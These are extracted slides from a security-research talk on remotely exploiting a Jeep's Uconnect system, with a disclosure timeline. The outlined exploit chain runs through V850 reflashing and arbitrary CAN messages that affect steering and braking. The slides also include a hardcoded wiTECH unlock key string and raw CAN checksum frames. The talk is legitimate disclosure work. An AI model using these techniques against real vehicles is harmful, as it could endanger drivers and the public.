![Page 62: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/62.jpg)
V850 Internals: SPI Memory Corruption Bugs
![Page 63: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/63.jpg)
V850 Internals: Sending Arbitrary CAN Msgs
![Page 64: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/64.jpg)
USB-less upgrade
• To flash v850, it needs to be in bootrom mode
• If you put it in bootrom mode, it restarts OMAP in upgrade mode• Attacker loses control
• Initial bootup code runs from read-only filesystem
• Calls “hd” application which lives in writable portion of filesystem
• Replace hd with your code that can run while v850 in bootrom mode
![Page 65: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/65.jpg)
Make a mistake?
![Page 66: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/66.jpg)
Exploit Chain
![Page 67: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/67.jpg)
Step 1: Find IP address of a vehicle
![Page 68: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/68.jpg)
Step 2: Get code running on OMAP chip
![Page 69: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/69.jpg)
Step 3: Reflash the v850,Reboot
![Page 70: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/70.jpg)
Step 4: Send arbitrary CANmessages
![Page 71: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/71.jpg)
![Page 72: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/72.jpg)
Cyber Physical Internals
![Page 73: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/73.jpg)
wiTECH: Overview
![Page 74: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/74.jpg)
wiTECH: Security Unlocks
![Page 75: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/75.jpg)
wiTECH: SecurityAccess
Uc.init(“G3n3r@ti0n”, “MD5”, “”, “BC”, “AES”, new String[]
{“com.chrysler.lx.UnlockCryptographerTest”,
"com.dcx.securityunlock.encrypted.EncryptedSecurityUnlock", “”,
“com.dcx.NGST.jCanFlash.flashfile.efd2.SecurityUnlockBuilderImpTest”})
;
![Page 76: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/76.jpg)
PAM: Checksums
Jeep Checksums
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 06 7F
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 08 D9
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 19 09
Prius Checksums
IDH: 02, IDL: E4, Len: 05, Data: 98 00 00 00 83
IDH: 02, IDL: E4, Len: 05, Data: 9A 00 00 00 85
IDH: 02, IDL: E4, Len: 05, Data: 9E 00 00 00 89
![Page 77: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/77.jpg)
PAM: Device
![Page 78: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/78.jpg)
PAM: Checksum Code
![Page 79: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/79.jpg)
Capturing CAN messages
![Page 80: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/80.jpg)
This year…METAL
![Page 81: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/81.jpg)
![Page 82: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/82.jpg)
![Page 83: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/83.jpg)
![Page 84: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/84.jpg)
Cyber Physical action!
![Page 85: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/85.jpg)
Normal CAN messages - example
![Page 86: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/86.jpg)
wipers
![Page 87: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/87.jpg)
Turn signals
![Page 88: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/88.jpg)
speedometer
![Page 89: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/89.jpg)
![Page 90: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/90.jpg)
![Page 91: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/91.jpg)
Diagnostic CAN messages
![Page 92: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/92.jpg)
![Page 93: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/93.jpg)
Diagnostic + Normal CAN messages
Us
Target ECUNormal
source of traffic
![Page 94: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/94.jpg)
Shut down source
Us
Target ECUNormal
source of traffic
![Page 95: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/95.jpg)
Become the source!
Us
Target ECUNormal
source of traffic
![Page 96: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/96.jpg)
steering
![Page 97: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/97.jpg)
Braking
![Page 98: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/98.jpg)
Disclosure
![Page 99: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/99.jpg)
Disclosure Timeline
• Oct 24, 2014 -> Vulnerabilities disclosed to FCA
• Mar 2, 2015 -> Disclosed ability to send CAN msgs remotely
• Apr 10, 2015 -> Full scope of hack disclosed
• May 12, 2015 -> FCA informed of cellular vector confirmation
• Jun 2, 2015 -> FCA informed of nation-wide cellular confirmation
• Jul 16, 2015 -> FCA given pre-release copy of our paper/research
• Jul 16, 2015 -> FCA releases Uconnect patch
• Jul 20, 2015 -> Wired article/video
• Jul 24, 2015 -> Sprint network blocks port 6667 traffic
• Jul 24, 2015 -> FCA Recalls 1.4MM vehicles vulnerable to attack
![Page 100: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/100.jpg)
![Page 101: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/101.jpg)
Additional testing?
![Page 102: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/102.jpg)
Impact
![Page 103: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/103.jpg)
![Page 104: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/104.jpg)
![Page 105: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/105.jpg)
Wired story
Recall
![Page 106: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/106.jpg)
stagefright
![Page 107: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/107.jpg)
![Page 108: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/108.jpg)
Conclusion
![Page 109: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/109.jpg)
Conclusions
• Remote compromise of a connected vehicle is possible• This is NOT just a FCA issue. More connectivity requires more security
• These issues are a combination of: OEMs, Tier-1s, Telecom
• Take this information and look at other cars• We’re just two bros with one car
• What might be considered an ‘air-gap’ may not be one in reality• Cellular->Uconnect->Reprogram Firmware->SPI
• Architecture can introduce more hurdles
• Hackers now have an example of making real-world impact
![Page 110: Remote Exploitation of an Unaltered Passenger Vhicle€¦ · Remote Exploitation of an Unaltered Passenger Vehicle Dr. Charlie Miller (cmiller@openrce.org) Chris Valasek (cvalasek@gmail.com)](https://reader034.fdocuments.us/reader034/viewer/2022042220/5ec5ecde0ef944652c2031b9/html5/thumbnails/110.jpg)
Questions?